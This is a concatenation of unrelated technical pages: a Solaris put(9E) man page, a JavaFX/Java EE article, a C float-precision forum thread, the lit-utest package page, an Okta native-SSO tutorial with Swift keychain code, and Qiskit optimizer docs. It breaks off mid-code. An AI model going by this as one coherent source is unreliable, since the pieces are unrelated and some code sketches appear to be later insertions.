A put() routine must do at least one of the following when it receives a message: pass the message to the next component on the stream by calling the putnext(9F) function; process the message, if immediate processing is required (for example, to handle high-priority messages); or enqueue the message (with the putq(9F) function) for deferred processing by the srv(9E) service routine.

Typically, a put() routine will switch on the message type, which is contained in the db_type member of the datab structure pointed to by mp. The action taken by the put() routine depends on the message type. For example, a put() routine might process high-priority messages, enqueue normal messages, and handle an unrecognized M_IOCTL message by changing its type to M_IOCNAK (negative acknowledgement) and sending it back to the stream head using the qreply(9F) function. The putq(9F) function can be used as a module's put() routine when no special processing is required and all messages are to be enqueued for the srv(9E) routine.

RETURN VALUES
Ignored.

CONTEXT
put() routines do not have user context.

SEE ALSO
srv(9E), putctl(9F), putctl1(9F), putnext(9F), putnextctl(9F), putnextctl1(9F), putq(9F), qreply(9F), queue(9S), streamtab(9S)

STREAMS Programming Guide
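The dispatch pattern described above can be sketched in user-space C. This is not kernel code — queue_t, mblk_t, and the putnext(9F)/putq(9F)/qreply(9F) functions exist only inside the kernel — so the message types and action codes below are hypothetical stand-ins, used purely to illustrate the switch-on-db_type logic a put() routine performs:

```c
/* Hypothetical stand-ins for STREAMS message types and the three actions a
 * put() routine may take; real code would switch on mp->b_datap->db_type. */
enum msg_type { MT_DATA, MT_PCPROTO, MT_IOCTL };
enum put_action { ACT_ENQUEUE, ACT_PROCESS_NOW, ACT_NAK_REPLY };

/* Dispatch logic of a typical put() routine: handle high-priority messages
 * immediately, NAK unrecognized ioctls back toward the stream head, and
 * enqueue ordinary messages for deferred processing by the srv() routine. */
enum put_action put_dispatch(enum msg_type type, int ioctl_recognized)
{
    switch (type) {
    case MT_PCPROTO:   /* high priority: process immediately */
        return ACT_PROCESS_NOW;
    case MT_IOCTL:     /* unknown ioctl: change to M_IOCNAK, qreply() it */
        return ioctl_recognized ? ACT_PROCESS_NOW : ACT_NAK_REPLY;
    default:           /* normal message: putq() it for the srv() routine */
        return ACT_ENQUEUE;
    }
}
```

Every branch ends in exactly one of the three mandated outcomes, which is the invariant the man page states: pass along, process now, or enqueue.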
http://docs.oracle.com/cd/E26502_01/html/E29045/put-9e.html
Combining JavaFX and Java Enterprise Modules

JavaFX is built on top of the Java platform; this creates a bond that lets it leverage all of the features of Java SE. Java EE is also built on top of Java SE in much the same way. As a result, applications built on both platforms can live in the same environment and share features, to each other's advantage. Developers can use this combined strength to build applications for a wide range of devices, from desktops and portable devices to servers. The focus of JavaFX as a tool is rich, interactive client-side visualization of content, which makes it a suitable candidate for the front end of your next enterprise application when merged with Java EE modules. The fluidity of integration can be a decisive factor, though; in the coming years, easier integration and wider acceptance are foreseeable.

JavaEE modules and JavaFX

Java EE modules are defined by many constituent specifications standardized by the Java Community Process (JCP). Several third-party organizations implement one or more JSRs and package them in a product. Some of these popular product families are Spring, Guice, Tomcat, JBoss, RestEasy, Glassfish, Hibernate, etc. JavaFX can be seamlessly integrated with Hibernate: Integrate JavaFX, Hibernate and PostgreSQL with the MVC Pattern. Technically there is no restriction on combining JavaFX with Java EE modules, but the approach can be hindered by a less-than-fluid merging technique. The API support for integrating JavaFX with enterprise modules is still emerging. Nonetheless, the Java SE, Java EE, and JavaFX trio establishes a wider horizon to explore. JavaFX is best known for its UI support and may replace Swing in the near future. Developing a client user interface is the best fit for JavaFX in the enterprise arena. This, however, demands a variety of robust controls and their seamless integration of data support.
JavaFX Client in JavaEE Modules

Client development is significantly different from enterprise development in its objectives and methodology. For example:

- Enterprise applications are now moving toward the cloud, so seamless interaction with cloud components is essential.
- Enterprise applications often implement patterns such as aspects, inversion of control, etc. How well JavaFX can leverage these patterns can be a decisive factor.
- Deployment and life-cycle management of an enterprise application is more server oriented. Upgrading a server product is a tedious task, and minimizing its downtime is a crucial process.
- Enterprise development is more about resource utilization than visual enhancement.
- Enterprise development is primarily focused on server performance, and the server is awake all the time, 24/7. Thus startup time may be critical for desktop applications, but in enterprise applications it is hardly an issue.

Interestingly, wherever JavaFX lacks a certain capability, it can point to its big brother Java SE. This is technically true because JavaFX only lacks when it is thought of as a separate entity from Java SE, which it actually is not, per se.

JavaFX and Web Services

Accessing components through web resources is a common pattern for enterprise applications. JavaFX can call remote web resources through SOAP as well as RESTful web services. As SOAP is well supported in Java and JavaFX, it poses no problem using the package javax.xml.soap. RESTful web services can be accessed using standard HTTP technologies. The Java API has extensive support for accessing REST-based web services, mainly through the java.io and java.net packages. JAX-WS provides support for multiple protocols along with HTTP. JavaFX can leverage JAX-WS annotation support in creating web service clients that use web services over a network.
Example The code snippets below give a minimal sales report using JavaFX, EclipseLink 2.x JPA in the persistence layer and JAX-WS 2.0 specification, the next generation web services API replacing JAX-RPC 1.0. The code can be modified to use any other JPA framework adhering to JSR 317. Persistence Unit @Entity @Table(name = "PRODUCT") @XmlRootElement @NamedQueries({ @NamedQuery(name = "Product.findAll", query = "SELECT p FROM Product p"), }) public class Product implements Serializable { private static final long serialVersionUID = 1L; @Id private Integer productID; private String batchNumber; private String productName; private String productDescription; private float unitPrice; @OneToMany(cascade = CascadeType.ALL, mappedBy = "productID") private Collection<Sales> salesCollection; //... Getter Setter methods } @Entity @Table(name = "REGION") @XmlRootElement @NamedQueries({ @NamedQuery(name = "Region.findAll", query = "SELECT r FROM Region r"), }) public class Region implements Serializable { private static final long serialVersionUID = 1L; @Id private Integer regionID; private String regionName; @OneToMany(cascade = CascadeType.ALL, mappedBy = "regionID") private Collection<Sales> salesCollection; //...Getter Setter methods } @Entity @Table(name = "SALES") @XmlRootElement @NamedQueries({ @NamedQuery(name = "Sales.findAll", query = "SELECT s FROM Sales s"), }) public class Sales implements Serializable { private static final long serialVersionUID = 1L; @Id private Long invoiceNumber; private int salesQuantity; @JoinColumn(name = "regionID", referencedColumnName = "regionID") @ManyToOne(optional = false) private Region regionID; @JoinColumn(name = "productID", referencedColumnName = "productID") @ManyToOne(optional = false) private Product productID; //...Getter and Setter methods } Web Service @WebService(serviceName = "ProductSalesService") public class ProductSalesService { @PersistenceUnit EntityManagerFactory emf; @WebMethod(operationName = "getProducts") 
public List getProducts() { return emf.createEntityManager().createNamedQuery("Product.findAll").getResultList(); }
@WebMethod(operationName = "getRegions") public List getRegions() { return emf.createEntityManager().createNamedQuery("Region.findAll").getResultList(); }
@WebMethod(operationName = "getAllSales") public List getAllSales() { return emf.createEntityManager().createNamedQuery("Sales.findAll").getResultList(); } }

JavaFX Client

public class ProductSalesClient extends Application {
private GridPane grid = new GridPane(); private List<Object> sales = new ArrayList<>(); ObservableList<ProdSalesQty> list = FXCollections.observableArrayList(); private BorderPane borderPane = new BorderPane(); private final int columWidth = 200;
@Override public void start(Stage primaryStage) { sales = getAllSales(); borderPane.setTop(grid); Scene scene = new Scene(borderPane, 300, 250); tabularData(); grid.addRow(0, barChart("Product", "Product Quantity Sales", "Product Name", "Sales Quantity", list), pieChart("Zonewise Sales", list), barChart("Product", "Product Quantity Sales", "Product Name", "Sales Quantity", list)); primaryStage.setTitle("Product Sales"); primaryStage.setScene(scene); primaryStage.show(); }
private void tabularData() { TableView<ProdSalesQty> table = new TableView<>();
TableColumn<ProdSalesQty, String> prodCol = new TableColumn<>("Product"); prodCol.setCellValueFactory(new Callback<TableColumn.CellDataFeatures<ProdSalesQty, String>, ObservableValue<String>>() { @Override public ObservableValue<String> call(CellDataFeatures<ProdSalesQty, String> p) { ProdSalesQty pq = p.getValue(); return new SimpleStringProperty(pq.getProdName()); } }); prodCol.setPrefWidth(columWidth);
TableColumn<ProdSalesQty, String> qtyCol = new TableColumn<>("Quantity"); qtyCol.setCellValueFactory(new Callback<TableColumn.CellDataFeatures<ProdSalesQty, String>, ObservableValue<String>>() { @Override public ObservableValue<String> call(CellDataFeatures<ProdSalesQty, String> p) { ProdSalesQty pq = p.getValue(); return new SimpleStringProperty(String.valueOf(pq.getSaleQty())); } }); qtyCol.setPrefWidth(columWidth);
TableColumn<ProdSalesQty, String> regCol = new TableColumn<>("Region"); regCol.setCellValueFactory(new Callback<TableColumn.CellDataFeatures<ProdSalesQty, String>, ObservableValue<String>>() { @Override public ObservableValue<String> call(CellDataFeatures<ProdSalesQty, String> p) { ProdSalesQty pq = p.getValue(); return new SimpleStringProperty(pq.getRegName()); } }); regCol.setPrefWidth(columWidth);
TableColumn<ProdSalesQty, String> costCol = new TableColumn<>("Cost"); costCol.setCellValueFactory(new Callback<TableColumn.CellDataFeatures<ProdSalesQty, String>, ObservableValue<String>>() { @Override public ObservableValue<String> call(CellDataFeatures<ProdSalesQty, String> p) { ProdSalesQty pq = p.getValue(); return new SimpleStringProperty(String.valueOf(pq.getCost())); } }); costCol.setPrefWidth(columWidth);
table.getColumns().addAll(prodCol, qtyCol, regCol, costCol);
for (Object salesObject : sales) { Sales s = (Sales) salesObject; ProdSalesQty psq = new ProdSalesQty(); psq.setProdName(s.getProductID().getProductName()); psq.setSaleQty(s.getSalesQuantity()); psq.setRegName(s.getRegionID().getRegionName()); psq.setCost((s.getSalesQuantity() * s.getProductID().getUnitPrice())); System.out.println(psq.toString()); list.add(psq); }
table.setItems(list); borderPane.setCenter(table); }
public BarChart barChart(String seriesName, String title, String xLabel, String yLabel, ObservableList<ProdSalesQty> list) { CategoryAxis xAxis = new CategoryAxis(); NumberAxis yAxis = new NumberAxis(); BarChart bc = new BarChart(xAxis, yAxis); bc.getData().clear(); bc.setAnimated(true); bc.setTitle(title); xAxis.setLabel(xLabel); yAxis.setLabel(yLabel); XYChart.Series series1 = new XYChart.Series(); series1.setName(seriesName); ObservableList products = FXCollections.observableList(getProducts()); for (Object productObject : products) { Product p = (Product) productObject; int sum = 0; boolean found = false; for (ProdSalesQty psq : list) { if (p.getProductName().equals(psq.getProdName())) { sum = sum + psq.getSaleQty(); found = true; } } if (found) { series1.getData().add(new XYChart.Data(p.getProductName(), sum)); } } bc.getData().add(series1); return bc; }
public PieChart pieChart(String title, ObservableList<ProdSalesQty> list) { PieChart pie = new PieChart(); pie.getData().clear(); ObservableList pieChartData = FXCollections.observableArrayList(); ObservableList regions = FXCollections.observableList(getRegions()); for (Object regionObject : regions) { Region r = (Region) regionObject; int sum = 0; boolean found = false; for (ProdSalesQty p : list) { if (r.getRegionName().equals(p.getRegName())) { sum = sum + p.getSaleQty(); found = true; } } if (found) {
pieChartData.add(new PieChart.Data(r.getRegionName(), sum)); } } pie.setData(pieChartData); pie.setAnimated(true); pie.setTitle(title); return pie; }
public static void main(String[] args) { launch(args); }
public class ProdSalesQty { private String prodName; private int saleQty; private String regName; private float cost; //...Getter and Setter methods }
private static java.util.List<java.lang.Object> getAllSales() { productsalesclient.ProductSalesService_Service service = new productsalesclient.ProductSalesService_Service(); productsalesclient.ProductSalesService port = service.getProductSalesServicePort(); return port.getAllSales(); }
private static java.util.List<java.lang.Object> getRegions() { productsalesclient.ProductSalesService_Service service = new productsalesclient.ProductSalesService_Service(); productsalesclient.ProductSalesService port = service.getProductSalesServicePort(); return port.getRegions(); }
private static java.util.List<java.lang.Object> getProducts() { productsalesclient.ProductSalesService_Service service = new productsalesclient.ProductSalesService_Service(); productsalesclient.ProductSalesService port = service.getProductSalesServicePort(); return port.getProducts(); } }

A minimal sales report: the JavaFX client accesses the JPA model on the server through web services (JAX-WS) to generate the report.

JavaFX and Spring

The Spring framework has revolutionized enterprise application development by introducing the POJO model. Spring does not impose any particular programming model; rather, it provides an environment where programmers may use the features of the framework according to their requirements. This is quite different from the old, caged EJB model of programming. The boilerplate code and constraints of programming are never felt in Spring, though a lot has been simplified recently in the EJB world. Spring gradually became quite popular with the Java community as an alternative to EJB.
Spring has extensive support for inversion of control, MVC, database access, security and authorization control, and much more under the same hood. In a sense, Spring provides a one-stop solution for enterprise development needs. Perhaps for this reason, Spring is one of the most sought-after technologies in the enterprise arena. So when we speak of enterprise development with JavaFX, how far behind can Spring be? Stephen Chin gave an excellent introduction to matchmaking the two technologies in the articles Application Initialization, Configuration and FXML and Authentication and Authorization. With the release of version 2.x, JavaFX has now become closer to the stable Java APIs; as a result, integrating external libraries such as Spring is just a matter of choice.

Conclusion

Practically, there are various ways to integrate Java EE modules; moreover, JavaFX can leverage the Java SE APIs, so there are a number of possibilities and options available for working with Java EE modules. The current list of Java EE 6 JSRs is voluminous. Merging each of them into JavaFX is possible with a little more effort. James L. Weaver demonstrated a way to integrate the external web services of the Twitter API in the article Best Practices for JavaFX 2.0 Enterprise Applications. However, JavaFX does not yet have a very fluid integration technique as an enterprise Java bean client. The UI controls in the JavaFX framework still need more options to play in the enterprise arena. Nonetheless, efforts are ongoing in the Java community. Until then, merging JavaFX with Java EE modules will remain an experiment for technology enthusiasts.
http://www.developer.com/java/ent/combining-javafx-and-java-enterprise-modules.html
Having such a simple C program:

Code:
#include <stdio.h>
#include <float.h>

int main( void )
{
    float fl1 = 0.1;

    // Set precision to 24 bits
    _control87(_PC_24, MCW_PC);

    printf( "fl1: %.10f\n", fl1 );
    printf( "fl1*fl1: %.10f\n", fl1*fl1 );
}

and compiling it like this:

Code:
cl /W4 /Od /arch:IA32 teset1.c

gives me:

fl1: 0.1000000015
fl1*fl1: 0.0100000007

Can someone please explain why multiplying the `fl1` variable returns 0.0100000007 instead of 0.0100000003 as expected?

PS. I know that assigning the `0.1` value to the `float` makes it *truncated* from `double` to `float`, but anyhow `0.1000000015 x 0.1000000015` results in **`0,01000000030000000225`**, as I've checked in the *Windows Programmer Calculator*.

Take your calculator and perform the following actions:
1. convert decimal 0,1 to binary (OK, in HEX)
2. truncate it to the max available length for the float
3. multiply it by itself
4. convert the result to decimal
What result will you get?
Victor Nijegorodov

Originally Posted by Mulligan
Can someone please explain why multiplying the `fl1` variable returns 0.0100000007 instead of 0.0100000003 as expected?

A single-precision FP has 6-7 significant decimal digits, and a double-precision FP has 15-18. A good rule is to consider the significant digits only. The range of significant digits in an FP starts with the first non-zero digit to the left and stretches to the right a certain number of digits determined by the precision. In your example, the 7 of 0.0100000007 is in a non-significant position of a single-precision FP, whereas the 3 of 0.0100000003 is in a significant position of a double-precision (*) FP. It means you can trust the 3, but not the 7.
The 7, most likely, has appeared as a result of truncations and roundings rather than proper arithmetic operations. This significant-digit rule is fine for the everyday use of FP numbers. It avoids a lot of head-scratching over the intricacies of the FP standard. But it is, of course, never wrong to study FP in depth.

(*) Supposedly, the "Windows Programmer Calculator" works with double precision (at least).

Last edited by wolle; December 1st, 2021 at 03:19 AM.

In addition to my post #4: Not all decimal numbers have a finite binary representation. This includes 0.1, which requires an infinite number of bits. So when you assign 0.1 to a single-precision FP, there is a truncation error. When you print the FP, you see 0.1000000015, where the 15 is the error. The 15, however, is not part of the significant-digit range and should not be considered. (If you instead assign 0.125, there is no truncation because it has a finite binary representation that fits within the significant-digit range.)

Now say you assign 0.1000000015 to a double-precision FP. This is a different story because now the 15 is part of the significant-digit range of the FP. If you square this FP, a 3 appears at a certain position determined by the place of the 15. If you instead square 0.1015, the 3 shows up again but in another position. This happens with both single and double precision. It is because 0.1015 is within the significant-digit range of both, as is the 3 in the squared result.

Last edited by wolle; December 1st, 2021 at 01:24.
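The significant-digit argument above can be checked directly. The sketch below (the function names are mine, not from the thread) squares 0.1 once at float precision and once at double precision. Since a 24-bit significand times a 24-bit significand needs at most 48 bits, the double product of the two float operands is exact, while the float product must round a second time — and that second rounding is where the trailing 7 comes from:

```c
/* Square 0.1f with the product rounded back to 24-bit float precision;
 * this extra rounding produces the 0.0100000007 seen in the original post. */
float square_float_tenth(void)
{
    float fl1 = 0.1f;       /* already carries ~1.5e-9 representation error */
    return fl1 * fl1;       /* product rounded again, to the nearest float  */
}

/* Same two float operands, but the product is kept in a double. A 24x24-bit
 * product fits in a double's 53-bit significand, so this result is exact. */
double square_tenth_exact(void)
{
    float fl1 = 0.1f;
    return (double)fl1 * (double)fl1;
}
```

Printing both with %.10f shows the float product drifting in the 10th decimal place while the double product of the same operands matches the value the poster computed by hand.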
https://forums.codeguru.com/showthread.php?565653-Float-point-number-simple-arithmetic&s=3a2e82174c130f54134664eb3f931dfd&p=2240237
llvm-lit module for first-class utest.h unit test support

This module allows you to run a utest testsuite as part of a larger lit testsuite. This is useful when you want to mix API unit tests with functional testing of your driver programs.

Installation

pip install lit-utest

Requirements

lit is required. Your tests should be utest.h-based or behave like it.

Usage

In each of your main utest test files, set the build command:

// UTEST: cc %s -o %utest_bin

This works just like the built-in ShTest RUN: line, but introduces the special UTEST keyword to lit. The runner executes this command and then runs the resultant %utest_bin output file. All lit substitutions are available for use as usual.

Once your build commands have been added to your unit tests, configure lit with the UTestRunner in lit.local.cfg:

import lit_utest
config.test_format = lit_utest.UTestRunner()

lit will now expect all discovered tests in the subdirectory to behave as utest tests, and ignore those without a UTEST: build command. It runs each unit test separately using utest's --filter switch, then collects the results and prints them in the way you'd expect lit to:

-- Testing: 3 tests, 3 threads --
XFAIL: lit_utest :: shell_tests/runline.xfail.test (1 of 3)
PASS: lit_utest :: shell_tests/runline.test (2 of 3)
PASS: lit_utest :: utest_tests/test.c (3 of 3)
*** MICRO-TEST: lit_utest :: utest_tests/test.c[MyTestF.c2] -> PASS
*** MICRO-TEST: lit_utest :: utest_tests/test.c[MyTestF.c] -> PASS
*** MICRO-TEST: lit_utest :: utest_tests/test.c[MyTestI.c/0] -> PASS
*** MICRO-TEST: lit_utest :: utest_tests/test.c[MyTestI.c/1] -> PASS
*** MICRO-TEST: lit_utest :: utest_tests/test.c[MyTestI.c2/0] -> PASS
[...]

For examples, see the test directory, where we eat our own dogfood.
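A minimal utest.h-based test file wired for this runner might look like the sketch below. The set and test names are invented for illustration, and it assumes utest.h is available on the compiler's include path; only the UTEST: build line is specific to this module:

```c
// UTEST: cc %s -o %utest_bin

#include "utest.h"

UTEST(math, addition) {
  ASSERT_EQ(2 + 2, 4);
}

UTEST(math, truthiness) {
  ASSERT_TRUE(1);
}

UTEST_MAIN();
```

lit discovers the file, runs the UTEST build command with the usual substitutions, then executes the produced binary once per test case via utest's --filter switch, reporting each case as a MICRO-TEST line.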
Compatibility

This module should work in all places upstream lit is supported, but I will make no extra effort to support python < 2.7.

Unlicence

utest.h is Public Domain, and llvm is either NCSA or Apache-2 licensed depending on the version, so it makes sense to dedicate this work to the PUBLIC DOMAIN.
https://pypi.org/project/lit-utest/
Although there is no standard yet for how to accomplish native single sign-on (SSO), there's been growing demand for a solution, due to the continued expansion of native apps, both desktop and mobile. In 2020, a report from RiskIQ counted 8.9 million mobile apps. There are also a large number of internal native apps available to employees within an enterprise. In comparison with desktop or web apps, it's even more critical to enable SSO for mobile apps, due to the smaller keyboard and screen on a mobile device, which makes password input more painful. To date, complex proprietary solutions have not proven interoperable with the variety of native applications an enterprise installs on employee devices. Thus, there is still a dire need for an industry-standard solution. Fortunately, this problem is widely recognized, and an OIDC draft spec, Native SSO for Mobile Apps, has been released to address the issue using a token-exchange approach. Okta recently added support for this draft spec. In this article, we describe the solution and compare it to an existing approach. We also share an example app to demonstrate how you can use the token-exchange solution to build SSO for your apps, not only within the same device, but also across devices. Specifically, the example demonstrates how you can single sign-on with Okta to a mobile app on one device (such as your iPhone), then have access to all your apps on another desktop device (such as your Mac).

Sharing web sessions with native apps

Before we describe the token-exchange solution, let's explore how to build a native SSO solution based on web SSO. If we could share web login sessions with native apps, we could leverage the advances in browser SSO technology. Web session sharing has become more restrictive due to the continued increase in privacy restrictions on mobile devices. Apple leads the charge on adding more privacy restrictions, but Android is quickly following suit.
Apple introduced SFSafariViewController in iOS 9, which enables an embedded web browser experience inside a mobile app. But Apple quickly changed its behavior. In iOS 11, SFSafariViewController no longer shares any browser cookies with the standalone Safari browser on the same device, making it impossible to share SSO sessions between a mobile app and a web app. Apple introduced ASWebAuthenticationSession in iOS 12 to add the ability to share browser cookies, but it is restrictive: it can only be used in an OIDC-style login flow, and it only shares persistent cookies, not session cookies. The Okta developer guide on web session sharing illustrates how two mobile apps on the same device can share a web login session. At a high level, it involves these steps:

- Enable persistent cookies. The Okta login session is stored in a session cookie by default, but only persistent cookies can be shared in iOS.
- Log in to App 1 through the embedded browser. The login session is saved in a persistent cookie.
- Log in to App 2 through the embedded browser. Since the login session is still in the persistent cookie, the user is not prompted for login.

Native SSO based on token exchange

Okta's native SSO solution is based on token exchange, and it builds on the OIDC draft spec Native SSO for Mobile Apps. The following diagrams, taken from the spec, illustrate the flow to enable native SSO. Sign-in to the first application is similar to a normal OIDC sign-in, using a system browser. The only difference is that we request the device_sso scope, and in return, we receive a device_secret along with the returned tokens. When Native App 2 requests login, it can simply take the ID token and device secret returned for App 1, and call the token endpoint to exchange them for tokens for App 2. The returned tokens for App 2 have their own refresh lifecycle. Our Native SSO Guide goes into more detail on how to enable native SSO, and demonstrates the interaction through curl commands.
How is it different

The token-exchange-based native SSO solution is simpler and better than sharing web SSO in several regards:

- Out-of-the-box config: Sharing web SSO requires you to use an API to configure all users to use a persistent cookie for session management. (The default is to use a session cookie.) A login session will persist even after you close the browser, which may be a surprise for some users. In contrast, native SSO is one of the supported grant types that can be easily enabled in the Okta admin console.
- Single logout: It is not possible to single-logout all applications with the web SSO sharing solution. If you want to log out from all apps, you have to log out from each app one by one. In contrast, with native SSO, one can simply revoke the device_secret, and all apps automatically sign out.
- Multiple devices: Sharing web SSO can only work on the same device. In contrast, native SSO can work across devices, as long as the device_secret can be safely shared. In fact, the remaining portion of this blog demonstrates how to implement native SSO across multiple Apple devices.

Single sign-on across multiple Apple devices

Many of us own multiple devices such as an iPhone, MacBook, or iPad. It would be great to single sign-on to apps across all the devices we own. In this section, we demonstrate how to sign in to a mobile app on an iOS device and a desktop app on a MacBook by leveraging iCloud Keychain. Note that this demo generalizes the device_secret concept described in the draft spec beyond a single device. While it allows you to single sign-on across multiple devices, you do lose the ability to revoke access on an individual device. (You can only revoke all devices.) Also, you lose the assurance that the device_secret can identify a single device. We first need to create two OIDC apps in your Okta admin console, one for the iOS mobile app, another for the Mac desktop app. See our Native SSO Guide for full instructions.
Next, let us start an Xcode project and add two targets: one for an iOS app (nativesso), another for a Mac app (nativessomac). The full source code can be found in the Native SSO sample app repo.

Store device secret in iCloud Keychain

The key to enabling native SSO is to be able to securely share device_secret across multiple devices. We can use iCloud Keychain. We will show how to use Apple's keychain interface functions to save and restore the device secret. By default, a keychain item is only stored per app. No other apps can access the keychain items your app saves. However, the keychain has a concept called the keychain access group. You can enable multiple apps to share the same keychain access group, and then all of these apps can read and write from the same keychain access group. A keychain access group is tied to a developer account, so only your apps (if enabled) can access the group. No other apps from other developers can access your group, so it is secure.

First, let us add the keychain access group. Click the target, select Signing & Capabilities, and click + to add a Keychain Sharing capability. Then input a unique group name, such as com.atko.group, in the box. This will update the entitlement file. Repeat this step for other targets or apps that you want to share the device secret with.

To save a device secret and ID token in the keychain, we invoke the following function:

static func addDeviceSecret(idToken: String, deviceSecret: String) {
    let attributes: [String: Any] = [
        (kSecClass as String): kSecClassGenericPassword,
        (kSecAttrSynchronizable as String): kCFBooleanTrue!,
        (kSecAttrLabel as String): "deviceSecret",
        (kSecAttrAccessGroup as String): "com.atko.group",
        (kSecAttrAccount as String): idToken,
        (kSecValueData as String): deviceSecret.data(using: .utf8)!
    ]
    // Let's add the item to the Keychain! 😄
    let status = SecItemAdd(attributes as CFDictionary, nil)
}

We first set the attributes:

- kSecClass is set to kSecClassGenericPassword because iCloud Keychain only supports password items, not certificates.
- The kSecAttrSynchronizable flag indicates that we want to use iCloud Keychain.
- We add a kSecAttrLabel to facilitate a later query to find this key.
- kSecAttrAccessGroup is set to the same keychain access group enabled in the entitlement, for example com.atko.group.
- We reuse fields designed for saving passwords: the ID token is saved in the kSecAttrAccount field, and the device secret in kSecValueData.

After the attributes are set, it is a simple call to Apple's API SecItemAdd to save the credentials. We can find the previously saved device secret through a query to iCloud Keychain using the following function:

static func queryForDeviceSecret() -> (idToken: String?, deviceSecret: String?) {
    let query: [String: Any] = [
        (kSecClass as String): kSecClassGenericPassword,
        (kSecAttrSynchronizable as String): kCFBooleanTrue!,
        (kSecAttrLabel as String): "deviceSecret",
        (kSecAttrAccessGroup as String): "com.atko.group",
        (kSecMatchLimit as String): kSecMatchLimitOne, // should only have one key
        (kSecReturnAttributes as String): true,
        (kSecReturnData as String): true
    ]
    var item: CFTypeRef?
    // should succeed
    let status = SecItemCopyMatching(query as CFDictionary, &item)
    if let existingItem = item as? [String: Any],
       let idToken = existingItem[kSecAttrAccount as String] as? String,
       let deviceSecretData = existingItem[kSecValueData as String] as? Data {
        let deviceSecret = String(data: deviceSecretData, encoding: .utf8)
        return (idToken, deviceSecret)
    }
    return (nil, nil)
}

The query uses the same set of parameters as the SecItemAdd call; then it is a simple call to Apple's API SecItemCopyMatching.

Exchange device secret for new tokens

The Okta OIDC iOS library is a wrapper around the AppAuth library. For token exchange, we will use AppAuth's built-in functions. We first have to construct a configuration for AppAuth:

let configuration = OIDServiceConfiguration.init(
    authorizationEndpoint: URL(string: authorizeUrl)!,
    tokenEndpoint: URL(string: tokenUrl)!
)

The authorizeUrl should be set to your AS (Authorization Server)'s authorize URL, and the tokenEndpoint should be the token URL.

Then we construct a token exchange request. Note that we specify the new grant type urn:ietf:params:oauth:grant-type:token-exchange, and we also pass the special parameters in the additionalParameters field.
Specifically, actor_token should be set to the device secret, and subject_token should be set to the ID token you obtained earlier when a different app signed in.

let request = OIDTokenRequest(
    configuration: configuration,
    grantType: "urn:ietf:params:oauth:grant-type:token-exchange",
    authorizationCode: nil,
    redirectURL: nil,
    clientID: oktaOidc.configuration.clientId,
    clientSecret: nil,
    scope: "openid offline_access",
    refreshToken: nil,
    codeVerifier: nil,
    additionalParameters: [
        "actor_token": deviceSecret!,
        "actor_token_type": "urn:x-oath:params:oauth:token-type:device-secret",
        "subject_token": idToken!,
        "subject_token_type": "urn:ietf:params:oauth:token-type:id_token",
        "audience": "api://default"])

Lastly, we perform the token exchange to get a new access token and refresh token for the new app.

// perform token exchange
OIDAuthorizationService.perform(request) { tokenResponse, error in
    if error != nil {
        // handle errors
    }
    // Signed in; persist tokens
}

End-to-end login flow

Now that we have the building blocks of saving and querying the device secret, and of token exchange, let's tie them together to enable login on a device. Essentially, the flow follows these steps:

- Look up deviceSecret in the iCloud keychain:

  let (idToken, deviceSecret) = queryForDeviceSecret()

- If deviceSecret exists, attempt token exchange, as outlined in the previous section.

- If the token exchange succeeds, the user is already logged in. We then save the login state locally so that the app does not need to do a login check on the next startup. This leverages the Okta OIDC library's built-in capability to persist login state locally:

  stateManager!.writeToSecureStorage()

- If there is no deviceSecret, or the token exchange fails, invoke the OIDC login flow.
First construct a configuration for Okta's OIDC library:

let configuration = try OktaOidcConfig(with: [
    "issuer": "https://{yourOktaDomain}/oauth2/default",  // replace with your issuer URL
    "clientId": "0oa826j5pHmPRt2n00w6",
    "scopes": "device_sso openid offline_access",
    "redirectUri": "nativesso:/callback",
    "logoutRedirectUri": "nativesso:/logout"
])

Then invoke the OIDC flow. On an iOS device:

oktaOidc.signInWithBrowser(from: self, callback: SignInHelper.oktaOidcCallback)

On a Mac:

oktaOidc.signInWithBrowser(redirectServerConfiguration: nil, callback: SignInHelper.oktaOidcCallback)

- If the sign-in is successful, we save the login state locally, the same as in step three. In addition, we save the device secret in the iCloud keychain so that other apps can perform native SSO login:

  removeDeviceSecret()
  addDeviceSecret(idToken: stateManager!.idToken!,
                  deviceSecret: stateManager!.authState.lastTokenResponse!.additionalParameters!["device_secret"]! as! String)

Note that the Okta SDK currently does not understand the device_secret field, so we parse the field directly from the last token response.

By now, you should be able to launch both the iPhone app and the Mac app. The first one will prompt you to log in, but the second one will log you in without any prompt.

Okta's Native SSO is available now

Okta's native SSO feature is now in GA (general availability). You can turn it on in your org and start experimenting. Beyond the demo use case we showed above, we envision it will open up many more scenarios. Give it a try, and drop a comment below to reach the development team directly. We would love to hear your feedback and feature requests.

Want to stay up to date on the latest articles, videos, and events from the Okta DevRel team? Follow our social channels: @oktadev on Twitter, Okta for Developers on LinkedIn, Twitch, and YouTube.
https://developer.okta.com/blog/2021/11/12/native-sso
MinimumEigenOptimizer

class MinimumEigenOptimizer(min_eigen_solver, penalty=None) [source]

A wrapper for minimum eigen solvers from Qiskit Aqua.

This class provides a wrapper for minimum eigen solvers from Qiskit to be used within the optimization module. It assumes a problem consisting only of binary or integer variables as well as linear equality constraints thereof. It converts such a problem into a Quadratic Unconstrained Binary Optimization (QUBO) problem by expanding integer variables into binary variables and by adding the linear equality constraints as weighted penalty terms to the objective function. The resulting QUBO is then translated into an Ising Hamiltonian whose minimal eigenvector and corresponding eigenstate correspond to the optimal solution of the original optimization problem. The provided minimum eigen solver is then used to approximate the ground state of the Hamiltonian to find a good solution for the optimization problem.

Examples

Outline of how to use this class:

from qiskit.aqua.algorithms import QAOA
from qiskit.optimization.problems import QuadraticProgram
from qiskit.optimization.algorithms import MinimumEigenOptimizer

problem = QuadraticProgram()
# specify problem here

# specify minimum eigen solver to be used, e.g., QAOA
qaoa = QAOA(...)
optimizer = MinimumEigenOptimizer(qaoa)
result = optimizer.solve(problem)

This initializer takes the minimum eigen solver to be used to approximate the ground state of the resulting Hamiltonian, as well as an optional penalty factor to scale the penalty terms representing linear equality constraints. If no penalty factor is provided, a default is computed during the algorithm (TODO).

Parameters

- min_eigen_solver (MinimumEigensolver) – The eigen solver to find the ground state of the Hamiltonian.
- penalty (Optional[float]) – The penalty factor to be used, or None for applying a default logic.

Methods
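To make the penalty conversion described above concrete, here is a small plain-Python sketch, independent of Qiskit, that folds a linear equality constraint into the objective as a weighted penalty term and brute-forces the minimum over all bitstrings. This is an illustrative toy, not the class's implementation; the function name and penalty value are choices made for the example.

```python
from itertools import product

def solve_qubo_with_penalty(linear, constraint_rhs, penalty=10.0):
    """Minimize sum(c_i * x_i) over binary x, with sum(x_i) == constraint_rhs
    folded in as a quadratic penalty term, mirroring (in miniature) how
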